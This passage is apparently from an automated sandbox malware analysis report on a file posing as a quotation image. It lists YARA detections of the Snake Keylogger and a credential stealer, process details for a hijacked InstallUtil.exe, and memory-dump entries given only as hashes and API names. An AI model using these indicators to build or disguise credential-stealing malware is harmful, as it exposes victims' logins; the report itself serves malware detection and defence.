                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000006.00000002.2301023518.0000000002659000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000006.00000002.2322264218.0000000003EFB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2301023518.00000000027C8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.2301023518.00000000027C8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000006.00000002.2301023518.00000000027C8000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                        Reputation:low
                        Has exited:true

                        Target ID:7
                        Start time:03:58:22
                        Start date:26/09/2024
                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                        Imagebase:0x7ff632ac0000
                        File size:42'064 bytes
                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.4525996681.0000000002AAE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.4525996681.00000000028E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:moderate
                        Has exited:false

                          Execution Graph

                          Execution Coverage:11.1%
                          Dynamic/Decrypted Code Coverage:100%
                          Signature Coverage:9.7%
                          Total number of Nodes:207
                          Total number of Limit Nodes:13
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: ,iq$4$$eq$$eq$$eq$$eq$$eq$$eq$$eq$$eq$$eq$$eq
                          • API String ID: 0-1238709156
                          • Opcode ID: 441db6cc1a718f4f1ebd672d6d5af533174e65ce9ddbd85a2b9d6f99276d7f48
                          • Instruction ID: 7554abca12a1b79fe31790dd190cd8a3be74d0e9d0af4bde0a1c63dfadfff362
                          • Opcode Fuzzy Hash: 441db6cc1a718f4f1ebd672d6d5af533174e65ce9ddbd85a2b9d6f99276d7f48
                          • Instruction Fuzzy Hash: 48B20534A01228DFDB54DFA9C984BADB7B6FF88304F148199E505AB2A5DB71EC81CF50
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: ,iq$4$$eq$$eq$$eq$$eq
                          • API String ID: 0-4077973435
                          • Opcode ID: 644923e64328e2754c6f232ebd09eeee4151145f5abc3946737c9f7b00a49154
                          • Instruction ID: ba05483209ff7b37f5d0627cf8e6bea49e0da45085f349726bf5821577b95bf3
                          • Opcode Fuzzy Hash: 644923e64328e2754c6f232ebd09eeee4151145f5abc3946737c9f7b00a49154
                          • Instruction Fuzzy Hash: 59221A74A01219DFDB64DFA4C984BADB7B2FF88304F1481D9E509AB2A5DB31AD81CF50

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2087204893.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1410000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: TJjq$Teeq$piq$xbhq
                          • API String ID: 0-2649575939
                          • Opcode ID: 17b26753d4421c353e0825bfaf234ae0ec5b83048155294e1c8210a3dc05366c
                          • Instruction ID: 9d40863f5bdf037cd0b375fc7de0d4d62b35957e2c79e5197ccb8eefc04835e9
                          • Opcode Fuzzy Hash: 17b26753d4421c353e0825bfaf234ae0ec5b83048155294e1c8210a3dc05366c
                          • Instruction Fuzzy Hash: 02A2B675E00228DFDB65CF69C984A99BBB2FF89304F1581E9D509AB325DB319E81CF40

                          Control-flow Graph

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2087204893.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1410000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: LReq$\seq
                          • API String ID: 0-217685183
                          • Opcode ID: 039cd134f9a0327ae580290e723011d1fe26277fb39eb1e05f53229b68ee517f
                          • Instruction ID: d097e8f2af4d1a6ca157add6ca4bb5263d614cb78cb0888a8f004ed56c72a453
                          • Opcode Fuzzy Hash: 039cd134f9a0327ae580290e723011d1fe26277fb39eb1e05f53229b68ee517f
                          • Instruction Fuzzy Hash: E4425E74A116198FDB14CF79E884AAEB7F2FF88300F15856AD409EB359DB34A941CF90

                          Control-flow Graph

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: fjq$8
                          • API String ID: 0-2019453504
                          • Opcode ID: a363b186041e311057b19b449d835dc6ed767ab9f84a7e287b9675703c36839a
                          • Instruction ID: bb9bd97b875c5e312828a359218938356e09684ccd6579436a8e2a6aaa4b7a74
                          • Opcode Fuzzy Hash: a363b186041e311057b19b449d835dc6ed767ab9f84a7e287b9675703c36839a
                          • Instruction Fuzzy Hash: CA42C271D00629CBDB64CF69C950AD9F7B2BF89310F5486EAD40DA7254EB30AE85CF90

                          Control-flow Graph

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2087204893.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1410000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: LReq$\seq
                          • API String ID: 0-217685183
                          • Opcode ID: 2c633b21849a43415dc6ad52f19df2d5172a6ef4452d3024b95c81aded3fcddc
                          • Instruction ID: 467661b7ed63057923d4190a0bfa719931cc12ef6d24126e19a434681658a093
                          • Opcode Fuzzy Hash: 2c633b21849a43415dc6ad52f19df2d5172a6ef4452d3024b95c81aded3fcddc
                          • Instruction Fuzzy Hash: A3E17E75E005299FDB24DF79E844AAEB7F2FF88300F118669D409EB359DB34A941CB90

                          Control-flow Graph

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2087204893.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1410000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: LReq$\seq
                          • API String ID: 0-217685183
                          • Opcode ID: 2ca364e3b50e456f18a1ec689fb2534a71f10fa7a001058d90ff6aedea80d029
                          • Instruction ID: 3023f22b4d4de82571db2221cc25f3950adb2326bd76e9e045a53ce4b3d95191
                          • Opcode Fuzzy Hash: 2ca364e3b50e456f18a1ec689fb2534a71f10fa7a001058d90ff6aedea80d029
                          • Instruction Fuzzy Hash: E4D17E75E005298FDB24DF79E844AAEB7F2BFC8300F158669D409EB359DB34A941CB90

                          Control-flow Graph

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2087204893.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1410000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: $vW+`
                          • API String ID: 0-2655680021
                          • Opcode ID: 0fff5cdccf7558cdc45edc52929305e4d554fbadcd3b638e55a1ebaa70b1ecc8
                          • Instruction ID: 1f581506f70ec65c6fdb3805874cdafc2b3a6c2f49256dfca4428a60689461d4
                          • Opcode Fuzzy Hash: 0fff5cdccf7558cdc45edc52929305e4d554fbadcd3b638e55a1ebaa70b1ecc8
                          • Instruction Fuzzy Hash: 1751E271B101058FCB15CBBDD88496EBBF2FBC8210729857AD505DB769EB30EC018790

                          Control-flow Graph

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: fjq$h
                          • API String ID: 0-322255796
                          • Opcode ID: 588eea92f7548570f0dd5c6993b6258b509235a88563e97fb1777280dea3d137
                          • Instruction ID: a05853fd014f164528550c8a5b752dd764f4aa4cd500f4bb0f9879bfc8aa7760
                          • Opcode Fuzzy Hash: 588eea92f7548570f0dd5c6993b6258b509235a88563e97fb1777280dea3d137
                          • Instruction Fuzzy Hash: 3461E671D006299BEB64CF6ACC40BD9FBB2BF89310F54C6AAD40DA7254DB305A85CF50
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111378217.00000000063E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06380000, based on PE: true
                          • Associated: 00000000.00000002.2111165061.0000000006380000.00000004.08000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6380000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 2
                          • API String ID: 0-450215437
                          • Opcode ID: 12dabbf3eb23e8781e257832027622bef32f11cd9b1cd267388aacc0997f0bf3
                          • Instruction ID: 1caf96cc87caac8b2edd2760eaef24bcad05eab57933a5ebdef906315c94495f
                          • Opcode Fuzzy Hash: 12dabbf3eb23e8781e257832027622bef32f11cd9b1cd267388aacc0997f0bf3
                          • Instruction Fuzzy Hash: 15B2B3B4E012298FDB65DF68C884B9DBBB6FF88300F1081EAD509A7255DB749E85CF50
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: (iq
                          • API String ID: 0-3943945277
                          • Opcode ID: bf2c5bddd5f574e6b0fe52ea39b9dcbe6710cff2e155f191962d7bb15d94cf90
                          • Instruction ID: 589b48c4b09d7795aa5a1d81e5b7b8b020bdac98efbe5776263809d83966a459
                          • Opcode Fuzzy Hash: bf2c5bddd5f574e6b0fe52ea39b9dcbe6710cff2e155f191962d7bb15d94cf90
                          • Instruction Fuzzy Hash: 1E326770A002168FEB98DFA9C59466EFBF2FF88300F148929D55AD7380DB34E945CB94
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2087204893.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1410000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: LReq
                          • API String ID: 0-2687900687
                          • Opcode ID: 4f74f61ef048a08bda40769e1b81260145127093a35fa9c0904c06e145ffd10a
                          • Instruction ID: 1222b7db9eb767bdf6b778bfddd4d77e2b7953ee501326a9491aedfd1ee494f9
                          • Opcode Fuzzy Hash: 4f74f61ef048a08bda40769e1b81260145127093a35fa9c0904c06e145ffd10a
                          • Instruction Fuzzy Hash: 90F18F71E002698FDB15CF69C984AADFBF2BF89300F19C19AD119AB266D7349D81CF50
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: Teeq
                          • API String ID: 0-348098666
                          • Opcode ID: 5d6773d042a3482d73fdab10bc40001a96408438406f1842f72303f9b988d65e
                          • Instruction ID: ccaef11f8821c6e0ae12031f939c2c3f59f88303768557b02c6d570197a29feb
                          • Opcode Fuzzy Hash: 5d6773d042a3482d73fdab10bc40001a96408438406f1842f72303f9b988d65e
                          • Instruction Fuzzy Hash: 86F1E170E05219CFEBA4DF69D884BADBBB6BB49304F1084EAD40DA7255DB709E85CF01
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: Teeq
                          • API String ID: 0-348098666
                          • Opcode ID: c79c65d0c8426aa1bca95fc3e058a5cf3c8952c8159542a7232ffd83f08bc911
                          • Instruction ID: be958fa64793d9726413f48a872ddd4e0da1e62ffa49770c4a83e28a1325ba6f
                          • Opcode Fuzzy Hash: c79c65d0c8426aa1bca95fc3e058a5cf3c8952c8159542a7232ffd83f08bc911
                          • Instruction Fuzzy Hash: C4F1D174E01219CFEBA4DF69D848BADBBB2BB49304F1484EAD40DA7255DB709E85CF01
                          APIs
                          • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 064F15AD
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111848323.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_64f0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID: MemoryProtectVirtual
                          • String ID:
                          • API String ID: 2706961497-0
                          • Opcode ID: dba7247a5060ce3f991c35751ae0d81cc6f0f15c7511c39a85c6c4012ee43e0e
                          • Instruction ID: e61345b63dff67065223748eb2c4c042b13abaf296e1caee2f77928bf2f2a0e9
                          • Opcode Fuzzy Hash: dba7247a5060ce3f991c35751ae0d81cc6f0f15c7511c39a85c6c4012ee43e0e
                          • Instruction Fuzzy Hash: 884196B9D002589FCF10CFA9D984ADEFBB1BB49310F10A42AE919B7210D735A942CF64
                          APIs
                          • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 064F15AD
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111848323.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_64f0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID: MemoryProtectVirtual
                          • String ID:
                          • API String ID: 2706961497-0
                          • Opcode ID: 4ab02699c76268db87b8b1b26aa0d8cd72199de2bef455e1025b17aeee8f51f5
                          • Instruction ID: 96ab2d21fd35cb4a27e8603a6ac914d0c1e329123023dd0aaacbd0d3f69bb869
                          • Opcode Fuzzy Hash: 4ab02699c76268db87b8b1b26aa0d8cd72199de2bef455e1025b17aeee8f51f5
                          • Instruction Fuzzy Hash: 604186B9D002589FCF10CFAAD984A9EFBB5BB49310F10A42AE919B7210D735A945CF64
                          APIs
                          • NtResumeThread.NTDLL(?,?), ref: 064F2ABE
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111848323.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_64f0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          • Opcode ID: 3fba62a142d3f2cfc6c7d44e435835561e11101381f9c02626a3e1f034043102
                          • Instruction ID: f92281851b8e7a59e43e0371e4097584bdc7abe4ee00bfd9addc3d3447a3de69
                          • Opcode Fuzzy Hash: 3fba62a142d3f2cfc6c7d44e435835561e11101381f9c02626a3e1f034043102
                          • Instruction Fuzzy Hash: 3A31CAB5D012189FCB10CFA9D984AAEFBF5FB49310F24942AE919B7300C775A945CFA4
                          APIs
                          • NtResumeThread.NTDLL(?,?), ref: 064F2ABE
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111848323.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_64f0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          • Opcode ID: dc0768ae7889ad4e5bfea7f06fb08b8e0a83b6418c0c9aaf7c40272112585006
                          • Instruction ID: fe320ffe3f331f5d558ad40367e10e7e7c61d3a4514cff1538196d2cf83d5de8
                          • Opcode Fuzzy Hash: dc0768ae7889ad4e5bfea7f06fb08b8e0a83b6418c0c9aaf7c40272112585006
                          • Instruction Fuzzy Hash: 3531A9B5D012189FCB10CFA9D984AAEFBF5FB49310F14942AE919B7300C775AA45CFA4
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: PHeq
                          • API String ID: 0-2873676430
                          • Opcode ID: 3fcb08fd47691d7538f68e31b82afc09594ad56676d445b3ea8d30f925c7397e
                          • Instruction ID: 2ba38855911817b44b3158a3293034f3fde13c6afaecc085d8a6044a4d8d82af
                          • Opcode Fuzzy Hash: 3fcb08fd47691d7538f68e31b82afc09594ad56676d445b3ea8d30f925c7397e
                          • Instruction Fuzzy Hash: 35C1C474E05308CFEB64CFA9D544BADBBF2BF49310F2484A9D409AB296DB749985CF40
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: PHeq
                          • API String ID: 0-2873676430
                          • Opcode ID: 60ae832997a43d03aeab937656266e64f444a7458a095098d1bad7b69b7b81f0
                          • Instruction ID: dc196d9eef3fcaad8c2582d2838a976ef4010fb6d7de6895c3b52fb2c0c87c80
                          • Opcode Fuzzy Hash: 60ae832997a43d03aeab937656266e64f444a7458a095098d1bad7b69b7b81f0
                          • Instruction Fuzzy Hash: B8C1D370E05318CFEBA4CFA9D544BADBBF6BF49310F1094A9D409AB296DB748985CF40
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: PHeq
                          • API String ID: 0-2873676430
                          • Opcode ID: de5cac07f073113a7ac3de7916d3d021ee2353905e39a309f6bde45a8bead709
                          • Instruction ID: 29a88e8d0f2193504ee3aa91107aae1904120a285043830eb7256cfcaf262028
                          • Opcode Fuzzy Hash: de5cac07f073113a7ac3de7916d3d021ee2353905e39a309f6bde45a8bead709
                          • Instruction Fuzzy Hash: BAC1C274E05318CFEB64CFA9D544B9DBBF2BF49310F2094A9D409AB296DB748985CF40
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112820848.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6830000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: Dlq
                          • API String ID: 0-3914526553
                          • Opcode ID: 506a1bc56954a1835d175a8c6beb7258b21cb6678d644c183051392f725976e3
                          • Instruction ID: 769193c4b37a861be53052f714288017774aff06492e4c9de5b23ee6122b3fee
                          • Opcode Fuzzy Hash: 506a1bc56954a1835d175a8c6beb7258b21cb6678d644c183051392f725976e3
                          • Instruction Fuzzy Hash: 42D1C174E01218DFDB54DFA9D994A9DBBB2FF88300F1081A9E409AB365DB35AD81CF50
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2087204893.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1410000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: LReq
                          • API String ID: 0-2687900687
                          • Opcode ID: 7cc3e1aaa5c85e1a49d85f94e2320811edb31710cc9ef9d4670074d865722131
                          • Instruction ID: f1bdf84588e22309d9d7f19b02f199058e6563d6b5c3b4a7d1271755d6fd409e
                          • Opcode Fuzzy Hash: 7cc3e1aaa5c85e1a49d85f94e2320811edb31710cc9ef9d4670074d865722131
                          • Instruction Fuzzy Hash: 95919031E102198FDB15CF69D990AADF7B2BF88300F29C5AAD515AB259D734AD81CF40
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2087204893.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1410000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: \seq
                          • API String ID: 0-3382732615
                          • Opcode ID: 7086f30ca4684940c5a28132b562b6bd272c765820e01c4ac00403f331d77649
                          • Instruction ID: 5e28b16d462356da365046c0012edcc711bb7684d7fc5e4834aa8d2b6094e449
                          • Opcode Fuzzy Hash: 7086f30ca4684940c5a28132b562b6bd272c765820e01c4ac00403f331d77649
                          • Instruction Fuzzy Hash: 0C8108B8E4020ADFDF14DFAAD5849AEBBB1BF48310F10A655D406EB2A4DB359941CF14
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111848323.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_64f0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f7999864e409d97a584549fb2202eeabc1c106381a1089518c31abc20e3cbc01
                          • Instruction ID: 800e5271845f9d96f6349e3c19cd67535694ea8c7c5bf9d4aa0082ac5eea3611
                          • Opcode Fuzzy Hash: f7999864e409d97a584549fb2202eeabc1c106381a1089518c31abc20e3cbc01
                          • Instruction Fuzzy Hash: D2D1D574E10218DFDB94CFA8D888BADBBB1FF49300F10816AD509AB394DB789985CF54
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111848323.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_64f0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2ffa64647d32ae14d15a96a3a88f754bc8981aeb799cb3fb603059233ccc9330
                          • Instruction ID: 27a583b716d18a2b5d0af5145ebc438ff3eb02ab2af1bfeb32a5dde036735599
                          • Opcode Fuzzy Hash: 2ffa64647d32ae14d15a96a3a88f754bc8981aeb799cb3fb603059233ccc9330
                          • Instruction Fuzzy Hash: 45B1E374E11218CFEB94CF69D948B9DB7B2BF8A304F1090AAD509A7354DB745D86CF40
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111848323.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_64f0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 86e707397f4021024da9437dd195bc24a3c29ab4a78356137baa4d2985809144
                          • Instruction ID: fc00f935a493e9bc6aef615baa18673bdc56f72ad82aa0096d22e13e9d11e3b3
                          • Opcode Fuzzy Hash: 86e707397f4021024da9437dd195bc24a3c29ab4a78356137baa4d2985809144
                          • Instruction Fuzzy Hash: 8AB1F374E11218CFEB94CF69D948BADBBB2BF8A304F1090AAD509A7354DB745D86CF40
                          Memory Dump Source
                          • Source File: 00000000.00000002.2087204893.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1410000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 120118e597034bb435fe1418bca6f6d0a5ff6e00413ec94f6c5b5eb6700a1734
                          • Instruction ID: 83bf7d0b73a649311c1af9bfe82ed2e69fd032d1001f4153b5758383df9fc240
                          • Opcode Fuzzy Hash: 120118e597034bb435fe1418bca6f6d0a5ff6e00413ec94f6c5b5eb6700a1734
                          • Instruction Fuzzy Hash: C6817E32B106159FC754DB6DD880EAEB7E3AFC8711F2A8165E405DB36ADE74AC018B90
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111378217.00000000063E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06380000, based on PE: true
                          • Associated: 00000000.00000002.2111165061.0000000006380000.00000004.08000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6380000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d3ba6381dd30b39982d65da281a304d0c1411078065b371594878663edb24746
                          • Instruction ID: b707fbcb6b3c42ba86bef78f7c43c6b55a4043220936f9f23cbfd26eda5030f5
                          • Opcode Fuzzy Hash: d3ba6381dd30b39982d65da281a304d0c1411078065b371594878663edb24746
                          • Instruction Fuzzy Hash: BF51FDB1E016288BDB18CF6BDC4469AFBF7AFC8304F14C1BAD508AA255DB740985CF50

                          Control-flow Graph

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2087204893.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1410000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: (iq$(iq$(iq$(iq$(iq
                          • API String ID: 0-3102978658
                          • Opcode ID: a744eef8f29b13ab8cd2099f6537e255ac8c41fa899d67d89ac6d322b268d194
                          • Instruction ID: 9e6bcc840bf3ea1f42abbb7428d25dc8c9310ba1bd2d704bac5a2e3de2916842
                          • Opcode Fuzzy Hash: a744eef8f29b13ab8cd2099f6537e255ac8c41fa899d67d89ac6d322b268d194
                          • Instruction Fuzzy Hash: 55C121353042658FDB15DF6DD840AAE3BA6EF84310B1884AAE909CB3A5CF35DC46C7A0

                          Control-flow Graph

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: (iq$(iq$Hiq
                          • API String ID: 0-2457769603
                          • Opcode ID: 5937cc0f36cf9907f0b20cdca581b8e512f4af4e6fbc77090dfc488239705d23
                          • Instruction ID: 89ea1e3f7d27ca04bcaf606f89a74267bad95ab7c5ebf116c0f3b410031db1d8
                          • Opcode Fuzzy Hash: 5937cc0f36cf9907f0b20cdca581b8e512f4af4e6fbc77090dfc488239705d23
                          • Instruction Fuzzy Hash: 4CE17434A00619DFCB44EFA4D49499DBBB2FFC9300F108569E915AB3A4DB34EC46CB91
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2109782239.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_56e0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'eq$4'eq
                          • API String ID: 0-907361030
                          • Opcode ID: aa15bbb9c1dca4c056ef021481f4b69562959f250c728a0929f6f5a150bb6e86
                          • Instruction ID: b614074b33a0e81573b9a91d85079212ccb62ad01f0286bd3b07c16360663a70
                          • Opcode Fuzzy Hash: aa15bbb9c1dca4c056ef021481f4b69562959f250c728a0929f6f5a150bb6e86
